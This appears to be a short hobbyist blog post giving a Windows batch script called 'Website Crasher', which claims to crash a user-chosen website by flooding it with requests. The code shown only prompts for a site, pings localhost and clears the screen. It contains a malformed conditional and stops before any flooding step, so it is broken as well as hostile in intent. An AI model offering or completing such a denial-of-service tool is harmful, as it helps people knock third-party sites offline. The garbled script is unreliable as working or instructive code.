BATCH FILE:
PLEASE TYPE IN NOTEPAD AND SAVE IT AS ".BAT" AND FILE TYPE - "ALL FILES"
Website Crasher
This site is just like the Website pinger but insted of pinging it crashes it with 1000 data non stop':A
@echo off
Title Website Crasher
color 0e
echo Enter the website you would like to crash
set input=
set /p input= Enter your Website here:
if %input%==goto A if NOT B
echo Processing Your request
ping localhost>nul
echo To end Crashing press CTRL + C
ping localhost>nul
cls
echo ------------------------------
Comments
Post a Comment